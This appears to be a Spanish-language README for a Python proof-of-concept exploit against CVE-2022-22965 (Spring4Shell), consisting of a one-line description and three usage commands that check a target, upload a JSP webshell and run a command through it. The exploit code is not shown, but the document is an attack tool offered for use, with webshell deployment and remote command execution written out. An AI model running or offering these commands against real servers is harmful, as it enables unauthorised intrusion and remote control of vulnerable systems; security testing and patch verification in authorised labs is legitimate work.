
Exploit de prueba de concepto basado en Python para CVE-2022-22965 (Spring4Shell) con verificación de vulnerabilidades, explotación remota y capacidades de ejecución de comandos de webshell.
python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting --check
python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting -f shell.jsp --exploit
python spring4shell.py -u http://192.168.110.117:8080/shell.jsp --cmd id
